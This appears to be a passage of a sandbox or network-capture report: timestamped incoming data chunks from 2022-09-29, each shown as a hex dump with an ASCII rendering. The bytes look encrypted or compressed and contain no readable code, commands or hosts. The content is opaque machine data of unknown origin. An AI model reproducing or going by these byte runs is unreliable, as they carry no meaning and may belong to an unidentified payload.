                                                                                                                                                            2022-09-29 12:45:15 UTC26005INData Raw: 85 07 81 43 1e 87 a7 b5 71 16 c8 39 63 70 87 0b 74 fc de b3 50 44 20 99 fa 0d 38 85 23 72 ab 28 d8 0a 79 e0 f5 f0 7d 1d 49 82 70 46 6d 9d 0f df 8f e1 0c 26 da 7a 65 14 2d 47 44 b4 f6 11 3c 6a a8 4c 89 d9 e5 8a 84 cb 29 2c 7a 1c 4f c3 30 5d e4 f2 5f 9b 96 1d 6d df 94 d2 14 d9 cd f2 07 b0 01 c6 0c 10 a5 f4 d0 2e dd b7 c2 f4 98 25 34 09 95 3d b1 a1 d6 95 fb ed 0b d3 18 d8 c6 b1 a5 e5 f6 46 57 cd 1a a4 6f f9 3c 84 8f 58 ac 21 e2 9e 38 b8 c2 21 7b ef 59 a9 5c ef 9e 95 20 cb 15 19 21 75 2e 6a 87 72 e0 ac 63 84 3f 4b fe 38 d4 89 29 ac 59 ca f1 00 46 2b cc 63 9a e2 97 1e 7e 20 04 20 b5 ea c6 d7 8b 9a 2c 44 6e 9a 5c 69 85 f6 57 47 5b f1 ec 62 e2 04 e6 09 c2 bf 4b b7 b6 6f 40 e7 6d e0 98 6f 59 bb 73 e2 3f 7b db 4a b6 cf 61 8a 6a ae 5b 2a 64 44 fd 94 fd 1b de 45 62
                                                                                                                                                            Data Ascii: Cq9cptPD 8#r(y}IpFm&ze-GD<jL),zO0]_m.%4=FWo<X!8!{Y\ !u.jrc?K8)YF+c~ ,Dn\iWG[bKo@moYs?{Jaj[*dDEb
                                                                                                                                                            2022-09-29 12:45:15 UTC26021INData Raw: 89 22 ad 9d ef 12 d3 0a 5a e0 86 8e 6e 92 30 41 fd d6 ef ff 18 61 a5 ca 27 51 74 94 88 cd 58 f2 31 1a a8 a7 f2 4f 2b c3 df 9d 2f f0 79 c6 29 09 af 2b 12 9e 11 f9 61 55 dc e6 56 e8 24 eb 04 c8 76 65 e4 fd 6d 1a c4 bb d9 aa 18 6c 69 24 e0 c6 d1 bc 40 b2 ad 03 12 69 f4 11 2d fa 3f 94 fe 94 6a 69 52 09 32 1b 66 a4 9d 76 58 e9 f6 18 2f ad fb d5 2e 66 a0 b1 8c 3c 01 20 e3 84 35 27 f7 00 ef 0b 60 8f 01 5e 9b df 34 ba 17 96 db 73 c8 59 db e0 57 1b bc fb 02 2e a8 74 2e 6e 23 ef ab 99 80 5d 72 62 e5 58 c0 70 9d 1c 4f 9f f6 27 2f b9 69 f1 f4 1d c5 1e f3 f0 b6 33 e9 f4 ec 4d 11 03 7c 8b 04 64 7c 92 02 bf cd 54 6f 87 54 e1 14 d2 b7 c2 fb fd 3d 53 70 d0 5f ce a2 e2 50 68 a8 05 b5 f1 8b cc b3 23 83 e2 b2 f4 2e f1 8c ec 87 4e ec 14 b8 d8 90 8e 72 80 b3 14 b7 5e 8c c3 3c
                                                                                                                                                            Data Ascii: "Zn0Aa'QtX1O+/y)+aUV$vemli$@i-?jiR2fvX/.f< 5'`^4sYW.t.n#]rbXpO'/i3M|d|ToT=Sp_Ph#.Nr^<
                                                                                                                                                            2022-09-29 12:45:15 UTC26037INData Raw: fb 71 67 0e 91 7c eb 70 51 23 65 04 93 67 f3 eb 55 94 5e 23 5d ee 71 1e 36 da 73 e6 64 38 ce 63 dc d5 8f f5 07 44 97 a0 a7 03 60 00 b1 de ce 85 70 16 e0 ca 6b f8 10 b7 6e f3 ae 00 dc 7d 24 f3 7d d2 26 e9 b7 b2 11 80 37 ea 3d 2d 55 15 7d c8 77 ce 42 95 0f 4b 98 f0 3f 6f 44 59 a7 36 dd 38 01 d0 ac 25 8f e2 80 7d 94 d1 58 b3 ed 72 20 3f 96 3b 20 05 c7 e3 b3 9a b6 4e 75 b7 db a2 1e 94 cb 4c 07 9b a6 9e 8c 0d 5e 50 ab ca 1a 75 af 10 c7 e1 02 b6 c4 c7 ff 2c 47 20 ec cd 96 61 04 42 d5 83 36 7e 6a 32 79 c5 a6 a0 23 66 c1 ca 89 cc 3d b6 a9 de ba ec a7 f0 5b 9b 53 dc 58 9a 57 3e c2 ed fd b9 73 cb 1d 83 ac ff 0c 6d ef a5 ee 33 6b cd 94 b9 f8 f5 4c f9 a5 b3 23 77 45 b4 2d 2c 7f 8c 13 83 a8 4d 5e 7d 14 d9 db 4d 66 e4 7a d7 a5 fb 50 05 1b 64 23 f0 9d 9d c0 f5 bc e2 41
                                                                                                                                                            Data Ascii: qg|pQ#egU^#]q6sd8cD`pkn}$}&7=-U}wBK?oDY68%}Xr ?; NuL^Pu,G aB6~j2y#f=[SXW>sm3kL#wE-,M^}MfzPd#A
                                                                                                                                                            2022-09-29 12:45:15 UTC26053INData Raw: 4f 21 66 52 66 65 0e 9d b6 38 46 8f 86 99 4b 3d 5f 16 9b 1d 6f 36 b3 de d1 2d 66 4c 6e 8d 4f 37 fa ca 8c 99 78 df 23 46 4d 2b 72 c8 8b 7c a5 4b 46 fb 54 c5 e7 9f fe 17 98 bc b0 0b b8 be e2 6a 86 36 7c ff 65 30 d4 da d3 97 a6 13 50 60 02 6f 34 06 aa 55 d0 13 34 5f 99 02 25 69 65 87 95 23 c9 7b a8 7a 76 4a ee 21 b3 f8 f0 d5 c0 3e 42 80 88 7f 97 96 a1 0a 27 e7 56 d5 06 4e fd ef 5d f6 81 01 00 f5 96 b6 aa cf 3f 83 88 69 da 4f ff 7d 97 ed 48 59 2e 43 8f 60 73 12 59 04 29 ed 92 0e 1d 2b a2 e0 37 02 a2 4c c7 6e 78 28 5d 00 8e a8 d5 4e 0d 63 28 5f 15 8e cd ba 28 8e 70 15 80 bc 3f f0 3d 27 41 ea c7 3a 4d e6 a1 e6 73 39 38 3c 51 c5 d1 9d 0f 9f c1 0b ed 9b c3 c7 08 5c 83 13 47 2c da 07 43 a5 c6 97 2c 85 ab 9e c4 cc a5 ad 15 db 95 a9 70 08 96 2c 0f 2d dc 41 aa 69 44
                                                                                                                                                            Data Ascii: O!fRfe8FK=_o6-fLnO7x#FM+r|KFTj6|e0P`o4U4_%ie#{zvJ!>B'VN]?iO}HY.C`sY)+7Lnx(]Nc(_(p?='A:Ms98<Q\G,C,p,-AiD
                                                                                                                                                            2022-09-29 12:45:15 UTC26069INData Raw: 40 70 b0 4c 8f 7b 86 71 c2 20 c3 14 5b 79 7f 70 27 83 32 22 11 8a a5 04 ba eb fb d8 60 9c d3 93 7a 36 bf 82 4a 35 d8 06 73 e2 b8 15 51 af 1e 72 ae d3 1e d0 ef 6c fd f3 06 92 65 16 68 f0 42 44 4c 26 3f b9 13 b3 cc 8f 82 9d 64 c1 c7 dc 9f ab 2e af 47 6a e4 89 76 10 0f a8 2e 23 5b e6 76 56 57 2e 30 90 88 27 ff f2 de 7b 44 9a 6b 60 af 11 78 45 3c 63 33 bd 3f 14 65 54 fd 90 10 2e 15 99 76 c6 68 11 d4 f0 56 bd bc ca 11 bf dd 9b 4e 7d b7 c2 c6 85 ef 7d 6a 71 18 6b 44 2d 81 c2 fe b2 25 d2 b3 3c 72 6a db bc 7f 38 ea 12 44 1e 44 0b 19 10 d6 f7 82 e3 28 7f c7 b2 9a 31 11 7b 50 8c f2 ad 74 f0 62 04 97 de e1 39 9a 9d 34 6b b2 59 da 90 d5 71 a0 e7 bd 57 41 54 8d 73 7e 42 38 7d 82 8b 7d f3 2e c4 3c e5 4a 9c a7 42 e6 4a eb 36 84 a5 a7 33 ee b5 dc c7 2e 5b 4c e4 2c 14 33
                                                                                                                                                            Data Ascii: @pL{q [yp'2"`z6J5sQrlehBDL&?d.Gjv.#[vVW.0'{Dk`xE<c3?eT.vhVN}}jqkD-%<rj8DD(1{Ptb94kYqWATs~B8}}.<JBJ63.[L,3
                                                                                                                                                            2022-09-29 12:45:15 UTC26085INData Raw: 8d 66 6e 21 70 b8 38 e8 57 b3 68 5b ca 83 99 8f 17 dd b1 5c 22 6d 3b d6 9c 68 c1 ce 2c e5 2c 8b 6b 87 09 92 2d f3 f9 f6 ff 45 ec b3 7d 4f c8 25 e8 5b c4 b0 88 6c 1d 8a b9 10 cc 8b 9e a9 a3 00 b9 2f b1 c6 12 85 6d 4b 87 05 55 39 ef a6 8f c5 82 5b 71 e7 9b 4f 66 27 50 38 51 48 d1 7a 26 bb 4f 36 c7 8d 41 b9 f6 56 e8 30 2f e9 4e 8d 6c 9d 99 0b 3d be 31 9e 5d 59 53 cf 97 b6 88 49 2e 17 49 b1 bc 05 05 ad 7f a9 36 2d 0f 6a 11 9f 09 a1 52 9a 33 1b 32 27 fa ff 20 97 32 e7 55 3c da 04 3b b3 33 4d 20 53 15 68 a0 82 52 e8 df 6e e6 66 3f 44 ea ec dd da 23 28 08 5f 0a 49 62 7f 21 64 2b 52 6e 5f b1 61 71 7a c3 3b 16 e3 86 85 c1 39 f2 75 1d 0b 53 b3 2b e8 72 3e 18 07 79 f0 5d 59 8e 69 b5 b1 b3 f7 e6 bf 36 c1 4f 12 c1 b2 dc 09 67 19 bc b0 db 82 f0 ba 1a ae f6 bb 31 dd 8c
                                                                                                                                                            Data Ascii: fn!p8Wh[\"m;h,,k-E}O%[l/mKU9[qOf'P8QHz&O6AV0/Nl=1]YSI.I6-jR32' 2U<;3M ShRnf?D#(_Ib!d+Rn_aqz;9uS+r>y]Yi6Og1
                                                                                                                                                            2022-09-29 12:45:15 UTC26101INData Raw: e4 ac 4e 5c 59 70 b8 db 9b a3 2e 05 33 fb c1 53 12 5f 19 66 f1 d1 3a ba 72 c8 45 1c 51 cc e4 46 66 48 09 9b 52 6a 18 7d d7 48 7a 5d 39 1a a4 6a 2a 57 65 ab ed a6 a7 1e 41 ca 01 17 0c 41 4d 8e 01 63 13 31 30 ac d7 59 37 9b bf b9 ac 04 0b 10 9c 94 3d 42 11 6c 59 ce d2 4b 52 a3 8a a1 4b 63 d5 a3 62 ff d1 af 9a ef 23 4e 16 17 cb 69 e7 61 f0 78 3d 4f 64 ff 47 df 03 fa fa 3f 8e 91 8f 2f 64 32 b8 41 f3 80 a1 48 07 8c 15 5f 68 70 37 4f ec 35 fd 22 97 14 d6 e5 f3 bf e0 75 16 92 fa 66 8a 10 a3 a0 a6 1f c9 0f 80 20 71 8d a2 23 80 1e ed bd 88 39 df 22 8f 17 39 e7 04 33 30 19 59 cf b3 c7 50 3e f4 b0 f6 c3 8d 1f 16 79 3f 42 cf 05 6a df ca f6 6d 03 d9 87 9e 2d 60 c3 3e f4 82 a8 fc 53 40 e6 0c 20 ad 81 23 b5 d4 2a 3e 99 66 4e c9 56 db 5c 69 ad 98 a2 2f a6 d8 a0 38 8b 34
                                                                                                                                                            Data Ascii: N\Yp.3S_f:rEQFfHRj}Hz]9j*WeAAMc10Y7=BlYKRKcb#Niax=OdG?/d2AH_hp7O5"uf q#9"930YP>y?Bjm-`>S@ #*>fNV\i/84
                                                                                                                                                            2022-09-29 12:45:15 UTC26117INData Raw: 22 41 e1 dd 04 66 3f 78 3b 64 fd 9d 79 ff 43 2c a1 20 dd ae d0 06 d2 66 70 8c 87 74 79 48 03 4e f4 65 96 03 a8 7b 25 0e b3 27 a8 4b 31 ab 02 3e 06 91 48 17 fa 6f 4d 48 af df 60 7b b8 65 8b ea d2 26 b4 bd 98 32 c1 e1 54 c6 7e c3 5c 1a aa 35 a8 f2 f8 aa 00 f8 6a 8d b0 ad fd 54 54 a3 64 62 8b 98 fd 84 c4 fc 96 38 75 41 7d e2 ac 73 ce 3c ee 36 bd 11 8f b0 89 28 d5 1a 3c 18 c6 ee 15 34 42 c4 27 64 8b 4a 95 27 8e 7a 43 95 dc d6 8a c9 e0 06 42 e0 ae 47 0c 0e 51 11 03 5b 7d ff ee d2 5a af b9 20 cd e5 8a 3f 21 ac 7f 87 f3 72 60 9a 37 ff 30 fa 20 ab f3 83 05 d8 35 0a 64 1c 57 24 4e b2 a0 65 e4 d7 c9 9a 6f b7 15 24 2a c8 6c 17 95 c1 79 0d a9 4e 8a a0 17 93 d2 ad b8 29 e6 6c 5a 10 c3 ee 38 e1 83 97 7e ad ad 9e 65 1f 4d 71 92 80 1b 8d ae 56 fd 51 3d 6c 99 ed 97 c3 eb
                                                                                                                                                            Data Ascii: "Af?x;dyC, fptyHNe{%'K1>HoMH`{e&2T~\5jTTdb8uA}s<6(<4B'dJ'zCBGQ[}Z ?!r`70 5dW$Neo$*lyN)lZ8~eMqVQ=l
                                                                                                                                                            2022-09-29 12:45:15 UTC26133INData Raw: c3 29 2b 8b 8f d3 81 b6 47 0e c0 16 ce b3 c2 2b 6f 82 e5 39 22 9c b3 f2 ba 39 26 da cc 08 b6 bc 02 77 0f 1a dc 3c 7e 3d 8a 62 15 e6 cf 5c c6 3b 2a c3 65 eb bd 7a 38 6b 54 cb da 29 5f 14 1c 61 bc 02 6d 30 8e d8 f4 65 d4 62 6a 69 1a 63 bc 33 0a 5a 71 b3 59 ed c1 d6 78 ec 81 56 e4 1a 3a dc 8d 5b 88 5c 81 19 35 5e b9 74 77 68 de 48 83 4d 7b aa 5e 87 88 bf 65 66 1b b3 10 c1 8d bb 4c 48 50 f1 5e 51 a9 0d f6 c7 ae 6a 92 d9 e4 1f ef 6d 1f ca 18 c8 1e ec 93 ce 43 aa 7b a1 d2 af 70 fe 47 65 0a f8 6b 2f f1 19 d3 88 ac 1b b7 e6 c5 2b 95 7f f3 6b e8 6d 32 ca be 0e 5c e9 4f fe 5e dc 9b 78 4d d8 9a 20 4f 0b b8 6f 7e 9a b0 52 53 20 f2 6d 18 85 28 05 3d 72 5d 26 48 52 3c e3 7d 89 ac d9 17 ff f4 04 c6 2e 2e da 97 42 4a a0 f4 52 60 e3 cd f1 70 1f cf 34 26 1b d9 ed e9 38 b7
                                                                                                                                                            Data Ascii: )+G+o9"9&w<~=b\;*ez8kT)_am0ebjic3ZqYxV:[\5^twhHM{^efLHP^QjmC{pGek/+km2\O^xM Oo~RS m(=r]&HR<}..BJR`p4&8
                                                                                                                                                            2022-09-29 12:45:15 UTC26149INData Raw: 9c d6 30 d7 96 29 34 18 51 9a bd 17 d2 39 42 48 4a 03 81 d7 a8 cf 58 2c ee 86 ba 6c c6 2c 85 95 bc 81 5b ec 35 6b 11 8a f5 b2 8e 0f 53 e9 67 6d 70 c2 ba f3 8e 2f f6 e6 7b ea 64 a9 22 9a 19 e9 c9 f3 4e 08 0e de c4 c8 a5 89 9f 6f 2d 68 b2 ee 63 71 9e 3b 18 77 d4 4e 2f eb 52 33 18 0e 31 b5 08 95 89 53 81 0c c3 c7 cd 79 0f e8 90 79 ad 73 5f b4 c0 d2 79 86 89 0f e4 67 34 c4 ce e9 2a 9c 23 d9 75 09 5d 7b d3 62 42 a8 21 39 e3 bc ad fd 3c 46 11 c7 91 f6 2d 41 a9 3a b5 74 d9 70 a4 ec ad 42 f2 dd d9 bf e7 71 ff d2 51 e5 2f d3 87 c5 77 f5 2f 81 8f fa 86 9b 5f fc 92 a7 ff d1 02 60 0d 91 5e 6d 1c 32 77 04 bb 79 06 ad 29 70 d0 f0 0b 99 75 58 53 e4 10 34 4d 77 99 b8 3a 6c a5 79 fd 32 a2 bf 65 0a 4c 15 93 ba 80 9f 0f d7 f8 69 e5 87 4f 0f ee 33 23 d6 54 f5 72 49 b6 fe 9d
                                                                                                                                                            Data Ascii: 0)4Q9BHJX,l,[5kSgmp/{d"No-hcq;wN/R31Syys_yg4*#u]{bB!9<F-A:tpBqQ/w/_`^m2wy)puXS4Mw:ly2eLiO3#TrI
                                                                                                                                                            2022-09-29 12:45:15 UTC26165INData Raw: b2 51 5b 77 1d 21 54 e4 15 3e 91 27 c0 9a aa ed 45 92 e7 3e c1 2a 8e c0 0c cd 36 41 29 29 c8 df 2f 3e 15 79 ff 31 77 64 d1 a0 89 f5 12 a3 09 da 3e c6 54 91 5a 1d b0 18 a2 a6 7e 16 01 a5 2b 96 c6 9a 52 ef a7 e8 65 8e 10 1e 7e e7 fe e3 60 5c bd c1 b8 1c ab 96 c8 db 02 5a 53 51 74 2d 41 97 d1 72 51 42 9b 34 dc 35 96 09 e4 69 4e 2e 0c ae da cc f0 a8 47 04 57 eb da 37 58 c8 94 53 38 62 ce 8c 68 aa a5 75 b7 13 a1 77 c1 fa 2b 8e c8 3c fb 35 84 2b 78 a4 b3 86 82 28 7f d3 f2 7d 09 bd d9 2c f0 71 06 7c fa a3 13 77 c0 09 7e 3f 9b 9e 68 29 8f 51 42 4f 75 e8 1e b4 b1 7d ea c8 f9 4a 3d 4b d8 72 34 aa 17 98 93 9f 39 ca d0 45 40 d8 3b f8 d4 24 46 c6 2d 0c dd 32 35 79 3f e7 eb 3f df 4b 7a d0 9f f7 a5 b8 fc 26 63 bd d3 ff 84 aa cb f7 e5 52 7f 9d 4a 20 40 5f 88 86 92 4e ce
                                                                                                                                                            Data Ascii: Q[w!T>'E>*6A))/>y1wd>TZ~+Re~`\ZSQt-ArQB45iN.GW7XS8bhuw+<5+x(},q|w~?h)QBOu}J=Kr49E@;$F-25y??Kz&cRJ @_N
                                                                                                                                                            2022-09-29 12:45:15 UTC26181INData Raw: 57 38 6f 35 d8 bd 98 6a 76 94 91 c6 3c 4d 3f 8c b5 f8 a8 29 5f 46 a6 39 3a f3 c3 11 a8 8d 04 55 93 54 b2 15 98 de db f8 ea 7f e3 ea 77 ce 41 6a 50 69 a4 67 82 d9 dd 78 c9 ed fb 34 3b 80 3c cf 61 d8 38 89 bd a0 9e 04 c6 b9 22 4f a8 32 08 c3 28 c6 d7 37 f9 d7 84 3b 47 ba 75 8d c7 87 ec ef 3c 5a c4 8f 5a ba 30 d9 8d 10 0d ae 5a b1 e2 a3 d5 8c 3d c9 31 98 66 06 c8 f5 f4 4e 1b f0 e2 be 0e 9b 03 3d 2c fe e5 fe 3b 82 89 7c 48 bc 54 51 bd c4 ca a0 04 09 87 57 b5 7e 98 6b b4 ec f2 29 1c ce 78 b8 ca 83 d3 d3 09 18 ec 32 d9 97 4f c8 70 7b 4c 87 3c 64 be 0c 68 42 6d 72 dd 0d 34 41 78 0a 55 58 70 51 9b c6 e3 7d 2e 86 01 a4 3f cb 93 57 6b f0 32 19 4c cf a7 3a ce bd 26 b7 d3 93 be 32 bd d9 2e 0b 49 1f 9f d6 a0 07 eb 5a c9 23 8d 62 ba e2 5b 41 d1 d0 07 84 e6 eb 14 88 5c
                                                                                                                                                            Data Ascii: W8o5jv<M?)_F9:UTwAjPigx4;<a8"O2(7;Gu<ZZ0Z=1fN=,;|HTQW~k)x2Op{L<dhBmr4AxUXpQ}.?Wk2L:&2.IZ#b[A\
                                                                                                                                                            2022-09-29 12:45:15 UTC26197INData Raw: 8f b7 0d 19 13 66 e6 ed e5 0c af f4 d2 8a b6 54 1d 1b 9e 63 4f d5 9a f0 dd de d4 70 6d 74 5c 80 97 f0 b2 4a cc f4 d0 80 14 e5 12 43 f3 36 f0 7d 11 1c 17 61 8c df 89 80 53 1a a5 0c be d7 8a 26 16 8a 33 af c5 cd f9 3d 31 10 ba 9b ac a1 e6 5f 5e 77 d4 fd 57 a1 72 b7 18 9f b6 88 f3 46 28 a4 ac 48 34 25 8f 98 00 4f b7 d7 65 5b 55 86 df f6 c7 5a 35 1b 45 5f 92 d1 a4 f0 2a b8 d5 19 98 5b 40 17 1c 8e da bc ed 4c bb d4 b8 54 f3 3d 85 0a 36 6b fe ea 23 73 0c 07 51 0c cb e1 1a 2e c9 43 08 12 69 64 d2 aa 40 35 08 2c 26 73 a8 24 69 b2 55 d0 a1 b9 db d0 7e 22 9e b1 97 cc f9 ec 96 09 ef 89 fd be bc 26 7c 0c ea f7 b6 dc 78 45 94 43 f9 40 a4 1e d5 86 41 a9 60 41 e1 d3 44 8b 83 b8 9a 2d 17 90 96 dc 44 dd e9 72 19 6c 7a ed 16 55 3b 50 53 90 f7 4b 85 b2 82 5b c9 be f4 f9 ac
                                                                                                                                                            Data Ascii: fTcOpmt\JC6}aS&3=1_^wWrF(H4%Oe[UZ5E_*[@LT=6k#sQ.Cid@5,&s$iU~"&|xEC@A`AD-DrlzU;PSK[
                                                                                                                                                            2022-09-29 12:45:15 UTC26213INData Raw: 63 c4 2e a6 12 d8 f5 fd e4 f8 26 61 0c e0 ce eb e8 3d 33 a1 c5 b5 58 6d fd c7 7c 91 f0 47 d5 1b fa 1d 78 4f 9f c8 03 3e 27 c1 43 0f b0 e2 eb d8 84 1b 32 04 52 74 3e 2a 1a e7 e8 99 8e 54 2f aa 53 4c b8 38 7c 5e dc bb 7c b8 cd 7a bf 59 a6 96 e6 85 90 a8 ef 90 73 05 1b 4c ac cf e0 a8 9a 59 61 18 8c 8f f3 e7 be c8 d9 75 92 0c 4f 45 b5 17 71 13 9d f3 ce 8a b1 2c 87 17 23 83 8c d1 bb 63 ff 21 f3 60 3a 4a 9a e3 f5 9f 14 a8 0c 41 fc 84 db 50 10 c3 2b c9 e3 73 29 ff dc d0 ce e4 17 52 84 c7 71 22 5e 3a bc f5 00 91 86 8f 78 4a a4 2a ff 3c 9a fe ff 61 7f 63 c2 51 49 10 68 40 76 b9 44 21 aa 63 87 ac 6d 7b 0f dd 63 a0 5d 70 3b 0b db a7 ab e0 e8 2b 3f b4 c0 0b c4 73 b6 2f 35 d5 5e 58 be 57 4a d5 f9 5b 0b aa 08 e0 f8 46 9d e2 fd e5 c2 16 9d c7 21 d5 ad 42 44 a4 2b e2 a2
                                                                                                                                                            Data Ascii: c.&a=3Xm|GxO>'C2Rt>*T/SL8|^|zYsLYauOEq,#c!`:JAP+s)Rq"^:xJ*<acQIh@vD!cm{c]p;+?s/5^XWJ[F!BD+
                                                                                                                                                            2022-09-29 12:45:15 UTC26229INData Raw: 70 94 e6 bb a5 ee 42 f6 49 3d 1b e1 8a e5 c2 7f 89 bb 56 31 19 63 f4 b0 53 65 d6 91 8d d2 17 bd fa 7b d7 f1 27 5b f7 72 57 49 5b 87 5d 52 d0 87 4b e0 e1 56 d1 c5 60 8a 0a 61 d7 b0 63 8a 35 32 d0 bc 74 c9 28 38 56 66 42 10 7d 87 86 aa fd 20 8e 33 14 de 82 a7 e4 18 e6 6e 4d 05 43 a5 a4 ae b3 8d 3c 49 d8 46 11 9e 3e f5 66 49 d0 50 e6 d0 a4 66 07 01 14 da 26 26 55 a1 b6 95 b4 3f f2 6c 1f 0b 6e 10 9f 86 08 3d 68 e0 a2 1a 50 8b c3 54 f3 1b 70 7b 58 32 ad 7c ff 1c ab cb 32 1e 9b 48 b6 d1 ea 16 d6 e0 a8 4f a1 15 27 41 7d c4 8e c9 68 9a 33 fe 3f 7b 08 0f 5a 06 59 f8 56 c3 32 fb 67 32 9b bb 32 87 8c b2 ad dc 28 ff e9 ed 5d d4 43 51 18 f8 6a aa 16 ff c0 76 47 f2 02 c7 d6 c9 67 d5 cd b7 4a 51 c6 aa 11 f6 ab bb e1 a4 e8 32 70 9f 15 d0 3b 4c 8a 7c 8b 48 75 5a 8c 38 d6
                                                                                                                                                            Data Ascii: pBI=V1cSe{'[rWI[]RKV`ac52t(8VfB} 3nMC<IF>fIPf&&U?ln=hPTp{X2|2HO'A}h3?{ZYV2g22(]CQjvGgJQ2p;L|HuZ8
                                                                                                                                                            2022-09-29 12:45:15 UTC26245INData Raw: c3 41 e3 a8 bf bf de b0 7e ba 9f ab 92 53 19 1c a0 a8 8c c7 2c 69 fb 60 cb d8 36 37 85 2b 6b 51 90 d3 83 e0 d7 00 9f 5c 21 93 03 56 0e 9f ba a7 be 19 68 1c 08 40 cf 52 3b 7f 5a e6 69 2b 24 dc 8d 11 ce 7e 38 53 ba db bf cb a1 42 5a b1 68 e4 9d e6 24 5a b2 10 50 03 e5 3e b6 89 cf 50 86 01 37 19 f3 7d 25 2b 25 e2 1d ea c9 39 3d c3 c5 59 77 98 13 6e f9 9e 0b c5 79 29 5e 0e 34 0f 7d cc a4 11 bb d6 2d 5c f3 c2 c5 c2 95 0b f4 f8 fc 4c b1 1d 3e 38 26 71 1b ae 7c f0 9e 87 ca 4b e7 e6 4a 93 7b 16 5c 5c 60 39 6c 52 30 96 61 cf bf d9 1b c7 73 e1 38 8d 37 39 76 90 3f 2d 8e 29 93 8b 3f bc a0 94 e5 d5 a0 1c f8 b2 e0 f8 ce d8 5b 9c 05 c6 e6 f7 e9 04 81 4d 09 ec 58 27 38 dc c0 65 9d 74 f7 4f b6 43 38 e2 c7 89 ef ae 35 69 f4 32 72 eb db bf 65 9d 14 41 8a b5 02 9e 77 06 35
                                                                                                                                                            Data Ascii: A~S,i`67+kQ\!Vh@R;Zi+$~8SBZh$ZP>P7}%+%9=Ywny)^4}-\L>8&q|KJ{\\`9lR0as879v?-)?[MX'8etOC85i2reAw5
                                                                                                                                                            2022-09-29 12:45:15 UTC26261INData Raw: d3 e8 0f 99 2e 31 f4 75 5e 80 e9 3c 83 d7 35 c6 95 88 1e 7a 62 63 ed a9 44 eb 13 1c a7 11 de 48 ed fd 69 41 03 b7 18 6c 94 b6 8b d4 e9 de ae c4 b2 e5 b3 44 ec a3 e8 63 54 27 f3 5d 95 56 15 ef d8 08 ce 36 fd 55 cd 9a 38 12 03 86 9d ff 11 81 fc 3d 99 27 50 48 16 23 8e 69 ef 59 b3 4b e7 71 76 b1 33 b1 6f b8 75 d7 f3 86 70 87 e3 68 00 87 3f 15 5f 35 90 9f 00 ac 5b 53 4f 90 69 9c b1 e7 dd b8 e6 2d b9 81 90 96 a5 56 0f cc fb 44 f9 3e fc c2 1d 6a 5f 6e 60 03 eb b7 71 49 58 55 a5 a4 5c 18 49 b3 c8 ff df 79 30 26 0c f2 85 6c 6a 70 b5 91 db 7a 51 e5 af 36 80 ef bd bb 17 50 64 1d fd ab 60 12 65 09 2c 3b 03 b2 54 50 3e a2 fc 8c 3a c0 3c d9 7e 4c ae 69 c3 20 87 19 0f 24 22 d7 45 f5 b0 9f 23 d9 0a 65 b4 e4 1c ad 73 78 8c 71 82 b7 87 3c 6e 79 23 b7 68 b7 81 b7 a2 5d 3c
                                                                                                                                                            Data Ascii: .1u^<5zbcDHiAlDcT']V6U8='PH#iYKqv3ouph?_5[SOi-VD>j_n`qIXU\Iy0&ljpzQ6Pd`e,;TP>:<~Li $"E#esxq<ny#h]<
                                                                                                                                                            2022-09-29 12:45:15 UTC26277INData Raw: 9c c7 29 c0 27 30 d8 dc 5e 10 8a 28 6c ea 2e 95 c2 2f 2e 3c 1c 62 93 ec 37 08 80 86 af 54 37 33 cb 1d 0a 7a 39 c7 8b bc eb 72 3a 38 d1 8d 9a fe 56 e4 d2 80 e4 2a e2 8c f4 05 ac b1 73 3f f4 04 ec a0 7f a2 a4 00 66 4e e6 a4 10 3f e1 9e d0 3c 42 29 0d c1 7d 37 da 7c 79 46 a2 c1 9d fb bf 3d 6f 91 bb 98 4a 80 93 d1 e2 41 d8 84 a1 42 d5 b3 23 28 a7 41 ff b7 ed 14 8d c5 81 3a 62 12 73 81 09 35 63 71 da e7 06 c1 29 f1 ed 85 a0 eb 9d f4 5e b4 18 72 f2 3f 28 67 af 5f 59 53 58 15 4a 68 e0 db b8 5c 3d 4e 7a 3b 04 e6 ae 53 26 1a 57 21 b9 e0 c4 80 9b ab 68 d5 72 29 17 2f 44 51 2c bb 29 a3 5b ec cd fd a1 08 93 ca 69 0b 39 1f 85 66 8d a2 9b 17 ae a2 62 1c 26 48 b8 6f 4c 0e cf ef 87 1a 04 0a 82 28 ca de 9d 66 ea b4 ca 4e db f2 e2 1d ed 7a e2 8c 90 85 9c f7 4f ee 54 94 96
                                                                                                                                                            Data Ascii: )'0^(l./.<b7T73z9r:8V*s?fN?<B)}7|yF=oJAB#(A:bs5cq)^r?(g_YSXJh\=Nz;S&W!hr)/DQ,)[i9fb&HoL(fNzOT
                                                                                                                                                            2022-09-29 12:45:15 UTC26293INData Raw: 10 04 9e 56 51 88 16 9f 7b 22 f3 1f 45 fe b8 50 71 76 74 6f 50 2a 18 da 8a 01 02 50 a4 81 02 6f 3d 10 59 21 e6 70 77 f1 52 96 87 99 83 48 a6 60 21 cf c2 0f 41 c3 b2 06 d7 3f 31 69 bf 78 3e d7 de b9 c7 1c 80 b9 23 d1 26 aa 6a 10 3f ea 39 1d 19 e7 d5 da 7a 7c 83 a7 17 0f 8a d1 5b d2 1b 17 d7 d8 f3 b7 91 02 08 9d 9e b7 f2 8a 3c 92 11 4d eb 02 1a 75 08 a3 ae 6a d6 72 4c 37 65 f7 84 4b 82 a4 8a 42 6c 0d 63 47 f4 4a de 6f 23 b3 34 8c 3b d6 2d e6 8a 22 e7 08 e8 fe 23 b4 1c 1a 1c 59 43 1d 27 dc e5 9f f5 60 d9 6f 1b 59 d9 12 11 bd 48 98 d2 bb 0c f6 33 17 90 ba 02 88 31 ad 7a 4e c0 44 55 f8 57 ba 96 53 2a 37 17 46 34 05 25 3d 52 ee aa 4a b0 34 25 dd fc 36 a8 ce 37 5c d9 a7 60 9c bf d3 09 57 42 2f c6 5c 85 2a e7 e3 9a 1d 66 d1 df 81 30 2e 21 c4 ad 10 23 96 ed 17 66
                                                                                                                                                            Data Ascii: VQ{"EPqvtoP*Po=Y!pwRH`!A?1ix>#&j?9z|[<MujrL7eKBlcGJo#4;-"#YC'`oYH31zNDUWS*7F4%=RJ4%67\`WB/\*f0.!#f
